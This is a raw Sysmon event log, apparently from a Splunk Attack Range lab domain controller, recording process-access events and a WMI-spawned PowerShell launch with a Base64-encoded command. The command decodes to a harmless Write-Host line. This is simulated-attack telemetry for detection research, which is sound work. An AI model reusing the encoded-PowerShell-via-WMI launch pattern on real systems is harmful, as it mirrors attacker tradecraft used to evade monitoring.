16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D97-603E-92AA-00000000AD01}1192810608C:\Windows\system32\conhost.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.945{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EC VwByAGkAdABlAC0ASABvAHMAdAAgADIAMgAxADEAZAAyADMAYQAtAGMAMwAzAGQALQA0ADUAMwA2AC0AYQBiADEAOAAtADgAYwAxADQANgAyADAAYgBmADEANABiAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002238113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.450{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E592F8019E4B8F6EB56AD259F0130D,SHA256=506A9EF8A7DD7B27297704AF509C69898C2F14CC36D6EA69DC2A724C9E00FFAD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002238112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:43.013{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d70f84-0x9a55c6cc) 11241100x80000000000000002239218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sny4cmlp.4pt.ps12021-03-02 16:53:44.975 10341000x80000000000000002239217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|